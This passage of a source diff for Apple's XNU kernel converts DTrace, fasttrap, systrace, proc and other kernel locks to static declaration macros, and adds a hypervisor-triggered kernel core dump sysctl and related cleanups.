&dtrace_lck_grp, &dtrace_lck_attr); /* provider state lock */ +static 
LCK_MTX_DECLARE_ATTR(dtrace_meta_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* meta-provider state lock */ +static LCK_RW_DECLARE_ATTR(dtrace_dof_mode_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* dof mode lock */ /* * DTrace Provider Variables @@ -426,7 +430,7 @@ int dtrace_helptrace_enabled = 0; static dtrace_errhash_t dtrace_errhash[DTRACE_ERRHASHSZ]; static const char *dtrace_errlast; static kthread_t *dtrace_errthread; -static lck_mtx_t dtrace_errlock; +static LCK_MTX_DECLARE_ATTR(dtrace_errlock, &dtrace_lck_grp, &dtrace_lck_attr); #endif /* @@ -19200,9 +19204,8 @@ static const struct cdevsw dtrace_cdevsw = .d_reserved_2 = eno_putc, }; -lck_attr_t* dtrace_lck_attr; -lck_grp_attr_t* dtrace_lck_grp_attr; -lck_grp_t* dtrace_lck_grp; +LCK_ATTR_DECLARE(dtrace_lck_attr, 0, 0); +LCK_GRP_DECLARE(dtrace_lck_grp, "dtrace"); static int gMajDevNo; @@ -19277,25 +19280,6 @@ dtrace_init( void ) return; } - /* - * Create the dtrace lock group and attrs. - */ - dtrace_lck_attr = lck_attr_alloc_init(); - dtrace_lck_grp_attr= lck_grp_attr_alloc_init(); - dtrace_lck_grp = lck_grp_alloc_init("dtrace", dtrace_lck_grp_attr); - - /* - * We have to initialize all locks explicitly - */ - lck_mtx_init(&dtrace_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_provider_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_meta_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_procwaitfor_lock, dtrace_lck_grp, dtrace_lck_attr); -#if DEBUG - lck_mtx_init(&dtrace_errlock, dtrace_lck_grp, dtrace_lck_attr); -#endif - lck_rw_init(&dtrace_dof_mode_lock, dtrace_lck_grp, dtrace_lck_attr); - /* * The cpu_core structure consists of per-CPU state available in any context. * On some architectures, this may mean that the page(s) containing the @@ -19303,9 +19287,6 @@ dtrace_init( void ) * is up to the platform to assure that this is performed properly. Note that * the structure is sized to avoid false sharing. 
*/ - lck_mtx_init(&cpu_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&cyc_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&mod_lock, dtrace_lck_grp, dtrace_lck_attr); /* * Initialize the CPU offline/online hooks. @@ -19316,7 +19297,7 @@ dtrace_init( void ) cpu_core = (cpu_core_t *)kmem_zalloc( ncpu * sizeof(cpu_core_t), KM_SLEEP ); for (i = 0; i < ncpu; ++i) { - lck_mtx_init(&cpu_core[i].cpuc_pid_lock, dtrace_lck_grp, dtrace_lck_attr); + lck_mtx_init(&cpu_core[i].cpuc_pid_lock, &dtrace_lck_grp, &dtrace_lck_attr); } cpu_list = (dtrace_cpu_t *)kmem_zalloc( ncpu * sizeof(dtrace_cpu_t), KM_SLEEP ); @@ -19324,7 +19305,7 @@ dtrace_init( void ) cpu_list[i].cpu_id = (processorid_t)i; cpu_list[i].cpu_next = &(cpu_list[(i+1) % ncpu]); LIST_INIT(&cpu_list[i].cpu_cyc_list); - lck_rw_init(&cpu_list[i].cpu_ft_lock, dtrace_lck_grp, dtrace_lck_attr); + lck_rw_init(&cpu_list[i].cpu_ft_lock, &dtrace_lck_grp, &dtrace_lck_attr); } lck_mtx_lock(&cpu_lock); @@ -19340,7 +19321,6 @@ dtrace_init( void ) offsetof(dtrace_string_t, dtst_next), offsetof(dtrace_string_t, dtst_prev)); - dtrace_isa_init(); /* * See dtrace_impl.h for a description of dof modes. * The default is lazy dof. diff --git a/bsd/dev/dtrace/dtrace_glue.c b/bsd/dev/dtrace/dtrace_glue.c index ffbd0bb15..fa6dad3e7 100644 --- a/bsd/dev/dtrace/dtrace_glue.c +++ b/bsd/dev/dtrace/dtrace_glue.c @@ -226,9 +226,9 @@ done: /* * cpuvar */ -lck_mtx_t cpu_lock; -lck_mtx_t cyc_lock; -lck_mtx_t mod_lock; +LCK_MTX_DECLARE_ATTR(cpu_lock, &dtrace_lck_grp, &dtrace_lck_attr); +LCK_MTX_DECLARE_ATTR(cyc_lock, &dtrace_lck_grp, &dtrace_lck_attr); +LCK_MTX_DECLARE_ATTR(mod_lock, &dtrace_lck_grp, &dtrace_lck_attr); dtrace_cpu_t *cpu_list; cpu_core_t *cpu_core; /* XXX TLB lockdown? 
*/ diff --git a/bsd/dev/dtrace/dtrace_subr.c b/bsd/dev/dtrace/dtrace_subr.c index 2ac848429..cdc074485 100644 --- a/bsd/dev/dtrace/dtrace_subr.c +++ b/bsd/dev/dtrace/dtrace_subr.c @@ -108,7 +108,7 @@ dtrace_fasttrap_fork(proc_t *p, proc_t *cp) * duty to resume the task. */ -lck_mtx_t dtrace_procwaitfor_lock; +LCK_MTX_DECLARE_ATTR(dtrace_procwaitfor_lock, &dtrace_lck_grp, &dtrace_lck_attr); typedef struct dtrace_proc_awaited_entry { struct dtrace_procdesc *pdesc; diff --git a/bsd/dev/dtrace/fasttrap.c b/bsd/dev/dtrace/fasttrap.c index e95eb2e1f..7129aca09 100644 --- a/bsd/dev/dtrace/fasttrap.c +++ b/bsd/dev/dtrace/fasttrap.c @@ -145,7 +145,10 @@ static dtrace_meta_provider_id_t fasttrap_meta_id; static thread_t fasttrap_cleanup_thread; -static lck_mtx_t fasttrap_cleanup_mtx; +static LCK_GRP_DECLARE(fasttrap_lck_grp, "fasttrap"); +static LCK_ATTR_DECLARE(fasttrap_lck_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(fasttrap_cleanup_mtx, + &fasttrap_lck_grp, &fasttrap_lck_attr); #define FASTTRAP_CLEANUP_PROVIDER 0x1 @@ -179,7 +182,8 @@ static fasttrap_hash_t fasttrap_provs; static fasttrap_hash_t fasttrap_procs; static uint64_t fasttrap_pid_count; /* pid ref count */ -static lck_mtx_t fasttrap_count_mtx; /* lock on ref count */ +static LCK_MTX_DECLARE_ATTR(fasttrap_count_mtx, /* lock on ref count */ + &fasttrap_lck_grp, &fasttrap_lck_attr); #define FASTTRAP_ENABLE_FAIL 1 #define FASTTRAP_ENABLE_PARTIAL 2 @@ -226,13 +230,6 @@ static const char *fasttrap_probe_t_zone_names[FASTTRAP_PROBE_T_ZONE_MAX_TRACEPO "dtrace.fasttrap_probe_t[3]" }; -/* - * APPLE NOTE: We have to manage locks explicitly - */ -lck_grp_t* fasttrap_lck_grp; -lck_grp_attr_t* fasttrap_lck_grp_attr; -lck_attr_t* fasttrap_lck_attr; - static int fasttrap_highbit(ulong_t i) { @@ -406,7 +403,8 @@ typedef struct fasttrap_tracepoint_spec { static fasttrap_tracepoint_spec_t *fasttrap_retired_spec; static size_t fasttrap_cur_retired = 0, fasttrap_retired_size; -static lck_mtx_t fasttrap_retired_mtx; +static 
LCK_MTX_DECLARE_ATTR(fasttrap_retired_mtx, + &fasttrap_lck_grp, &fasttrap_lck_attr); #define DEFAULT_RETIRED_SIZE 256 @@ -598,7 +596,7 @@ fasttrap_setdebug(proc_t *p) sprunlock(p); p = PROC_NULL; - mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident); + (void) mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident, TASK_FLAVOR_CONTROL); p = sprlock(pident.p_pid); if (p == PROC_NULL) { @@ -1521,7 +1519,7 @@ fasttrap_proc_lookup(pid_t pid) /* * APPLE NOTE: We have to initialize all locks explicitly */ - lck_mtx_init(&new_fprc->ftpc_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&new_fprc->ftpc_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr); new_fprc->ftpc_next = bucket->ftb_data; bucket->ftb_data = new_fprc; @@ -1580,7 +1578,7 @@ fasttrap_proc_release(fasttrap_proc_t *proc) * APPLE NOTE: explicit lock management. Not 100% certain we need this, the * memory is freed even without the destroy. Maybe accounting cleanup? */ - lck_mtx_destroy(&fprc->ftpc_mtx, fasttrap_lck_grp); + lck_mtx_destroy(&fprc->ftpc_mtx, &fasttrap_lck_grp); kmem_free(fprc, sizeof (fasttrap_proc_t)); } @@ -1663,8 +1661,8 @@ fasttrap_provider_lookup(proc_t *p, fasttrap_provider_type_t provider_type, cons /* * APPLE NOTE: locks require explicit init */ - lck_mtx_init(&new_fp->ftp_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - lck_mtx_init(&new_fp->ftp_cmtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&new_fp->ftp_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr); + lck_mtx_init(&new_fp->ftp_cmtx, &fasttrap_lck_grp, &fasttrap_lck_attr); ASSERT(new_fp->ftp_proc != NULL); @@ -1747,8 +1745,8 @@ fasttrap_provider_free(fasttrap_provider_t *provider) * APPLE NOTE: explicit lock management. Not 100% certain we need this, the * memory is freed even without the destroy. Maybe accounting cleanup? 
*/ - lck_mtx_destroy(&provider->ftp_mtx, fasttrap_lck_grp); - lck_mtx_destroy(&provider->ftp_cmtx, fasttrap_lck_grp); + lck_mtx_destroy(&provider->ftp_mtx, &fasttrap_lck_grp); + lck_mtx_destroy(&provider->ftp_cmtx, &fasttrap_lck_grp); kmem_free(provider, sizeof (fasttrap_provider_t)); @@ -2652,7 +2650,8 @@ fasttrap_attach(void) ASSERT(fasttrap_tpoints.fth_table != NULL); for (i = 0; i < fasttrap_tpoints.fth_nent; i++) { - lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } /* @@ -2670,7 +2669,8 @@ fasttrap_attach(void) ASSERT(fasttrap_provs.fth_table != NULL); for (i = 0; i < fasttrap_provs.fth_nent; i++) { - lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } /* @@ -2689,7 +2689,8 @@ fasttrap_attach(void) #ifndef illumos for (i = 0; i < fasttrap_procs.fth_nent; i++) { - lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } #endif @@ -2786,19 +2787,6 @@ fasttrap_init( void ) } - /* - * Create the fasttrap lock group. Must be done before fasttrap_attach()! 
- */ - fasttrap_lck_attr = lck_attr_alloc_init(); - fasttrap_lck_grp_attr= lck_grp_attr_alloc_init(); - fasttrap_lck_grp = lck_grp_alloc_init("fasttrap", fasttrap_lck_grp_attr); - - /* - * Initialize global locks - */ - lck_mtx_init(&fasttrap_cleanup_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - lck_mtx_init(&fasttrap_count_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - fasttrap_attach(); /* @@ -2813,7 +2801,6 @@ fasttrap_init( void ) fasttrap_retired_size = DEFAULT_RETIRED_SIZE; fasttrap_retired_spec = kmem_zalloc(fasttrap_retired_size * sizeof(*fasttrap_retired_spec), KM_SLEEP); - lck_mtx_init(&fasttrap_retired_mtx, fasttrap_lck_grp, fasttrap_lck_attr); fasttrap_inited = 1; } diff --git a/bsd/dev/dtrace/fbt.c b/bsd/dev/dtrace/fbt.c index c39912255..075227d1e 100644 --- a/bsd/dev/dtrace/fbt.c +++ b/bsd/dev/dtrace/fbt.c @@ -460,7 +460,7 @@ fbt_provide_module_kernel_syms(struct modctl *ctl) for (seg = firstsegfromheader(mh); seg != NULL; seg = nextsegfromheader(mh, seg)) { kernel_section_t *sect = firstsect(seg); - if (strcmp(seg->segname, "__KLD") == 0) { + if (strcmp(seg->segname, "__KLD") == 0 || strcmp(seg->segname, "__KLDDATA") == 0) { continue; } diff --git a/bsd/dev/dtrace/fbt_blacklist.c b/bsd/dev/dtrace/fbt_blacklist.c index a65e6a477..b06fdb36f 100644 --- a/bsd/dev/dtrace/fbt_blacklist.c +++ b/bsd/dev/dtrace/fbt_blacklist.c @@ -206,6 +206,7 @@ const char * fbt_blacklist[] = CLOSURE(prf) CLOSURE(proc_best_name) CLOSURE(proc_is64bit) + X86_ONLY(proc_require) CRITICAL(rbtrace_bt) CRITICAL(register_cpu_setup_func) CRITICAL(ret64_iret) @@ -241,6 +242,11 @@ const char * fbt_blacklist[] = CRITICAL(uread) CRITICAL(uwrite) CRITICAL(vstart) + X86_ONLY(zone_has_index) + X86_ONLY(zone_id_require) + X86_ONLY(zone_id_require_panic) + X86_ONLY(zone_range_contains) + X86_ONLY(zone_require_panic) }; #define BLACKLIST_COUNT (sizeof(fbt_blacklist)/sizeof(fbt_blacklist[0])) diff --git a/bsd/dev/dtrace/lockstat.c b/bsd/dev/dtrace/lockstat.c index b5a669e44..49f40dcff 100644 --- 
a/bsd/dev/dtrace/lockstat.c +++ b/bsd/dev/dtrace/lockstat.c @@ -122,8 +122,6 @@ lockstat_probe_t lockstat_probes[] = }; dtrace_id_t lockstat_probemap[LS_NPROBES]; -void (*lockstat_probe)(dtrace_id_t, uint64_t, uint64_t, - uint64_t, uint64_t, uint64_t); static dtrace_provider_id_t lockstat_id; @@ -248,9 +246,6 @@ lockstat_attach(dev_info_t *devi) return DDI_FAILURE; } - lockstat_probe = dtrace_probe; - membar_producer(); - return DDI_SUCCESS; } diff --git a/bsd/dev/dtrace/sdt_subr.c b/bsd/dev/dtrace/sdt_subr.c index 28e92734f..67f056dab 100644 --- a/bsd/dev/dtrace/sdt_subr.c +++ b/bsd/dev/dtrace/sdt_subr.c @@ -972,6 +972,9 @@ sdt_argdesc_t sdt_args[] = { {"hv", "guest-enter", 1, 1, "uint64_t *", "guest_regs_t *" }, {"hv", "guest-exit", 0, 0, "uint32_t", "uint32_t" }, {"hv", "guest-exit", 1, 1, "uint64_t *", "guest_regs_t *" }, + {"hv", "guest-error", 0, 0, "uint32_t", "uint32_t" }, + {"hv", "guest-error", 1, 1, "uint64_t *", "guest_regs_t *" }, + {"hv", "guest-error", 2, 2, "uint32_t", "uint32_t" }, { NULL, NULL, 0, 0, NULL, NULL } }; diff --git a/bsd/dev/dtrace/systrace.c b/bsd/dev/dtrace/systrace.c index 0e483d760..1342e7785 100644 --- a/bsd/dev/dtrace/systrace.c +++ b/bsd/dev/dtrace/systrace.c @@ -82,9 +82,8 @@ extern const char *syscallnames[]; #define LOADABLE_SYSCALL(a) 0 /* Not pertinent to Darwin. */ #define LOADED_SYSCALL(a) 1 /* Not pertinent to Darwin. 
*/ -extern lck_attr_t* dtrace_lck_attr; -extern lck_grp_t* dtrace_lck_grp; -static lck_mtx_t dtrace_systrace_lock; /* probe state lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_systrace_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* probe state lock */ systrace_sysent_t *systrace_sysent = NULL; void (*systrace_probe)(dtrace_id_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t); @@ -406,7 +405,6 @@ systrace_init(const struct sysent *actual, systrace_sysent_t **interposed) s->stsy_underlying = a->sy_callc; s->stsy_return_type = a->sy_return_type; } - lck_mtx_init(&dtrace_systrace_lock, dtrace_lck_grp, dtrace_lck_attr); } @@ -489,10 +487,12 @@ systrace_enable(void *arg, dtrace_id_t id, void *parg) lck_mtx_lock(&dtrace_systrace_lock); if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying) { + /* It is not possible to write to sysent[] directly because it is const. */ vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_systrace_syscall); ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); + return 0; } @@ -507,9 +507,20 @@ systrace_disable(void *arg, dtrace_id_t id, void *parg) systrace_sysent[sysnum].stsy_return == DTRACE_IDNONE); if (disable) { + /* + * Usage of volatile protects the if statement below from being optimized away. + * + * Compilers are clever and know that const array values can't change in time + * and the if below is always false. That is because it can't see that DTrace + * injects dtrace_systrace_syscall dynamically and violates constness of the + * array. 
+ */ + volatile const struct sysent *syscallent = &sysent[sysnum]; + lck_mtx_lock(&dtrace_systrace_lock); - if (sysent[sysnum].sy_callc == dtrace_systrace_syscall) { - ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(systrace_sysent[sysnum].stsy_underlying)); + if (syscallent->sy_callc == dtrace_systrace_syscall) { + ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, + (vm_offset_t)&syscallent->sy_callc, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); } @@ -605,10 +616,10 @@ typedef struct { #endif /* MACH_ASSERT */ } mach_trap_t; -extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */ -extern int mach_trap_count; +extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */ +extern const int mach_trap_count; -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; /* XXX From osfmk/i386/bsd_i386.c */ struct mach_call_args { @@ -845,6 +856,7 @@ machtrace_enable(void *arg, dtrace_id_t id, void *parg) lck_mtx_lock(&dtrace_systrace_lock); if (mach_trap_table[sysnum].mach_trap_function == machtrace_sysent[sysnum].stsy_underlying) { + /* It is not possible to write to mach_trap_table[] directly because it is const. */ vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_machtrace_syscall); ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t)); } @@ -865,10 +877,20 @@ machtrace_disable(void *arg, dtrace_id_t id, void *parg) machtrace_sysent[sysnum].stsy_return == DTRACE_IDNONE); if (disable) { - lck_mtx_lock(&dtrace_systrace_lock); + /* + * Usage of volatile protects the if statement below from being optimized away. + * + * Compilers are clever and know that const array values can't change in time + * and the if below is always false. 
That is because it can't see that DTrace + * injects dtrace_machtrace_syscall dynamically and violates constness of the + * array. + */ + volatile const mach_trap_t *machtrap = &mach_trap_table[sysnum]; - if (mach_trap_table[sysnum].mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) { - ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t)); + lck_mtx_lock(&dtrace_systrace_lock); + if (machtrap->mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) { + ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, + (vm_offset_t)&machtrap->mach_trap_function, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); } diff --git a/bsd/dev/i386/dtrace_isa.c b/bsd/dev/i386/dtrace_isa.c index d0ac4f6c8..0391f2c18 100644 --- a/bsd/dev/i386/dtrace_isa.c +++ b/bsd/dev/i386/dtrace_isa.c @@ -165,15 +165,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) } } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - return; -} - /* * Runtime and ABI */ diff --git a/bsd/dev/i386/sysctl.c b/bsd/dev/i386/sysctl.c index 944df9f64..e3c160312 100644 --- a/bsd/dev/i386/sysctl.c +++ b/bsd/dev/i386/sysctl.c @@ -42,6 +42,10 @@ #include #include +#if DEBUG || DEVELOPMENT +#include +#endif + static int _i386_cpu_info SYSCTL_HANDLER_ARGS @@ -1103,4 +1107,87 @@ SYSCTL_INT(_machdep_misc, OID_AUTO, traptrace_enabled, CTLFLAG_KERN | CTLFLAG_RW | CTLFLAG_LOCKED, &traptrace_enabled, 0, "Enabled/disable trap trace"); + +/* + * Trigger a guest kernel core dump (internal only) + * Usage: sysctl kern.trigger_kernel_coredump = 1 + * (option selector must be 1, other values reserved) + */ + +static int +sysctl_trigger_kernel_coredump(struct sysctl_oid *oidp __unused, void *arg1, int arg2, struct sysctl_req *req) +{ + int error = 0; + hvg_hcall_return_t hv_ret; + char buf[2]; // 1 digit for dump option + 1 '\0' + + if (req->newptr) { + // Write request + if 
(req->newlen > 1) { + return EINVAL; + } + error = SYSCTL_IN(req, buf, req->newlen); + buf[req->newlen] = '\0'; + if (!error) { + if (strcmp(buf, "1") != 0) { + return EINVAL; + } + /* Issue hypercall to trigger a dump */ + hv_ret = hvg_hcall_trigger_dump(arg1, HVG_HCALL_DUMP_OPTION_REGULAR); + + /* Translate hypercall error code to syscall error code */ + switch (hv_ret) { + case HVG_HCALL_SUCCESS: + error = SYSCTL_OUT(req, arg1, 41); + break; + case HVG_HCALL_ACCESS_DENIED: + error = EPERM; + break; + case HVG_HCALL_INVALID_CODE: + case HVG_HCALL_INVALID_PARAMETER: + error = EINVAL; + break; + case HVG_HCALL_IO_FAILED: + error = EIO; + break; + case HVG_HCALL_FEAT_DISABLED: + case HVG_HCALL_UNSUPPORTED: + error = ENOTSUP; + break; + default: + error = ENODEV; + } + } + } else { + // Read request + error = SYSCTL_OUT(req, arg1, arg2); + } + return error; +} + + +static hvg_hcall_vmcore_file_t sysctl_vmcore; + +void +hvg_bsd_init(void) +{ + if (!cpuid_vmm_present()) { + return; + } + + if ((cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0) { + /* Register an OID in the sysctl MIB tree for kern.trigger_kernel_coredump */ + struct sysctl_oid *hcall_trigger_dump_oid = zalloc_permanent(sizeof(struct sysctl_oid), ZALIGN(struct sysctl_oid)); + struct sysctl_oid oid = SYSCTL_STRUCT_INIT(_kern, + OID_AUTO, + trigger_kernel_coredump, + CTLTYPE_STRING | CTLFLAG_RW, + &sysctl_vmcore, sizeof(sysctl_vmcore), + sysctl_trigger_kernel_coredump, + "A", "Request that the hypervisor take a live kernel dump"); + *hcall_trigger_dump_oid = oid; + sysctl_register_oid(hcall_trigger_dump_oid); + } +} + #endif /* DEVELOPMENT || DEBUG */ diff --git a/bsd/dev/mem.c b/bsd/dev/mem.c index 06a5c7432..c64e63601 100644 --- a/bsd/dev/mem.c +++ b/bsd/dev/mem.c @@ -78,11 +78,13 @@ #include #include #include -#include + +#include #include #include #include /* for kernel_map */ +#include #include /* for PE_parse_boot_argn */ @@ -103,7 +105,7 @@ extern boolean_t kernacc(off_t, size_t 
); #endif -static caddr_t devzerobuf; +static SECURITY_READ_ONLY_LATE(caddr_t) devzerobuf; int mmread(dev_t dev, struct uio *uio); int mmwrite(dev_t dev, struct uio *uio); @@ -219,10 +221,8 @@ mmrw(dev_t dev, struct uio *uio, enum uio_rw rw) error = 0; /* Always succeeds, always consumes all input */ break; case 3: - if (devzerobuf == NULL) { - MALLOC(devzerobuf, caddr_t, PAGE_SIZE, M_TEMP, M_WAITOK); - bzero(devzerobuf, PAGE_SIZE); - } + assert(devzerobuf != NULL); + if (uio->uio_rw == UIO_WRITE) { c = uio_curriovlen(uio); @@ -254,6 +254,14 @@ fault: #endif } +__startup_func +static void +devzerobuf_init(void) +{ + devzerobuf = zalloc_permanent(PAGE_SIZE, ZALIGN_NONE); /* zeroed */ +} +STARTUP(ZALLOC, STARTUP_RANK_LAST, devzerobuf_init); + #if CONFIG_DEV_KMEM void dev_kmem_init(void) diff --git a/bsd/dev/monotonic.c b/bsd/dev/monotonic.c index 6fc42ef7f..910f22288 100644 --- a/bsd/dev/monotonic.c +++ b/bsd/dev/monotonic.c @@ -60,7 +60,7 @@ static const struct cdevsw mt_cdevsw = { /* * Written at initialization, read-only thereafter. 
*/ -lck_grp_t *mt_lock_grp = NULL; +LCK_GRP_DECLARE(mt_lock_grp, MT_NODE); static int mt_dev_major; static mt_device_t @@ -96,9 +96,6 @@ mt_device_assert_inuse(__assert_only mt_device_t dev) int mt_dev_init(void) { - mt_lock_grp = lck_grp_alloc_init(MT_NODE, LCK_GRP_ATTR_NULL); - assert(mt_lock_grp != NULL); - mt_dev_major = cdevsw_add(-1 /* allocate a major number */, &mt_cdevsw); if (mt_dev_major < 0) { panic("monotonic: cdevsw_add failed: %d", mt_dev_major); @@ -123,7 +120,7 @@ mt_dev_init(void) __builtin_unreachable(); } - lck_mtx_init(&mt_devices[i].mtd_lock, mt_lock_grp, LCK_ATTR_NULL); + lck_mtx_init(&mt_devices[i].mtd_lock, &mt_lock_grp, LCK_ATTR_NULL); } return 0; diff --git a/bsd/dev/munge.c b/bsd/dev/munge.c index ced3cded2..800757bf5 100644 --- a/bsd/dev/munge.c +++ b/bsd/dev/munge.c @@ -547,6 +547,12 @@ munge_llllll(void *args __unused) /* Nothing to do, already all 64-bit */ } +void +munge_llll(void *args __unused) +{ + /* Nothing to do, already all 64-bit */ +} + void munge_ll(void *args __unused) { diff --git a/bsd/kern/bsd_init.c b/bsd/kern/bsd_init.c index c204382af..6dd42a5f0 100644 --- a/bsd/kern/bsd_init.c +++ b/bsd/kern/bsd_init.c @@ -117,13 +117,13 @@ #include /* for pseudo_inits */ #include #include -#include #include #include #include #include #include +#include #include #include /* for thread_resume() */ #include /* for mcache_init() */ @@ -144,9 +144,7 @@ #include /* for gif_init() */ #include /* for devfs_kernel_mount() */ #include /* for kmem_suballoc() */ -#include /* for psem_lock_init() */ #include /* for log_setsize() */ -#include /* for tty_init() */ #include /* proc_uuid_policy_init() */ #include /* flow_divert_init() */ #include /* for cfil_init() */ @@ -231,17 +229,17 @@ int nswapmap; void *swapmap; struct swdevt swdevt[1]; +static LCK_GRP_DECLARE(hostname_lck_grp, "hostname"); +LCK_MTX_DECLARE(hostname_lock, &hostname_lck_grp); +LCK_MTX_DECLARE(domainname_lock, &hostname_lck_grp); + dev_t rootdev; /* device of the root */ dev_t 
dumpdev; /* device to take dumps on */ long dumplo; /* offset into dumpdev */ long hostid; char hostname[MAXHOSTNAMELEN]; -lck_mtx_t hostname_lock; -lck_grp_t *hostname_lck_grp; char domainname[MAXDOMNAMELEN]; -lck_mtx_t domainname_lock; - -char rootdevice[DEVMAXNAMESIZE]; +char rootdevice[DEVMAXNAMESIZE]; struct vnode *rootvp; bool rootvp_is_ssd = false; @@ -259,20 +257,14 @@ int legacy_footprint_entitlement_mode = LEGACY_FOOTPRINT_ENTITLEMENT_IGNORE; __private_extern__ int proc_ref_tracking_disabled = 0; /* disable panics on leaked proc refs across syscall boundary */ #endif -#if OS_REASON_DEBUG -__private_extern__ int os_reason_debug_disabled = 0; /* disable asserts for when we fail to allocate OS reasons */ -#endif - extern kern_return_t IOFindBSDRoot(char *, unsigned int, dev_t *, u_int32_t *); extern void IOSecureBSDRoot(const char * rootName); extern kern_return_t IOKitBSDInit(void ); extern boolean_t IOSetRecoveryBoot(bsd_bootfail_mode_t, uuid_t, boolean_t); extern void kminit(void); -extern void file_lock_init(void); extern void bsd_bufferinit(void); extern void oslog_setsize(int size); extern void throttle_init(void); -extern void acct_init(void); #if CONFIG_LOCKERBOOT #define LOCKER_PROTOBOOT_MOUNT "/protoboot" @@ -339,14 +331,13 @@ static void parse_bsd_args(void); #if CONFIG_DEV_KMEM extern void dev_kmem_init(void); #endif -extern void time_zone_slock_init(void); extern void select_waitq_init(void); static void process_name(const char *, proc_t); static void setconf(void); #if CONFIG_BASESYSTEMROOT -static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg); +static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check); static boolean_t bsdmgroot_bootable(void); #endif // CONFIG_BASESYSTEMROOT @@ -411,25 +402,18 @@ extern struct os_refgrp rlimit_refgrp; extern thread_t cloneproc(task_t, coalition_t, proc_t, int, int); extern int (*mountroot)(void); -lck_grp_t * proc_lck_grp; -lck_grp_t * 
proc_slock_grp; -lck_grp_t * proc_fdmlock_grp; -lck_grp_t * proc_kqhashlock_grp; -lck_grp_t * proc_knhashlock_grp; -lck_grp_t * proc_ucred_mlock_grp; -lck_grp_t * proc_mlock_grp; -lck_grp_t * proc_dirslock_grp; -lck_grp_attr_t * proc_lck_grp_attr; -lck_attr_t * proc_lck_attr; -lck_mtx_t * proc_list_mlock; -lck_mtx_t * proc_klist_mlock; +LCK_ATTR_DECLARE(proc_lck_attr, 0, 0); +LCK_GRP_DECLARE(proc_lck_grp, "proc"); +LCK_GRP_DECLARE(proc_slock_grp, "proc-slock"); +LCK_GRP_DECLARE(proc_fdmlock_grp, "proc-fdmlock"); +LCK_GRP_DECLARE(proc_mlock_grp, "proc-mlock"); +LCK_GRP_DECLARE(proc_ucred_mlock_grp, "proc-ucred-mlock"); +LCK_GRP_DECLARE(proc_dirslock_grp, "proc-dirslock"); +LCK_GRP_DECLARE(proc_kqhashlock_grp, "proc-kqhashlock"); +LCK_GRP_DECLARE(proc_knhashlock_grp, "proc-knhashlock"); -#if CONFIG_XNUPOST -lck_grp_t * sysctl_debug_test_stackshot_owner_grp; -lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; -#endif /* !CONFIG_XNUPOST */ -extern lck_mtx_t * execargs_cache_lock; +LCK_MTX_DECLARE_ATTR(proc_list_mlock, &proc_mlock_grp, &proc_lck_attr); #if XNU_TARGET_OS_OSX /* hook called after root is mounted XXX temporary hack */ @@ -438,7 +422,7 @@ void (*unmountroot_pre_hook)(void); #endif void set_rootvnode(vnode_t); -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; /* called with an iocount and usecount on new_rootvnode */ void @@ -486,17 +470,6 @@ 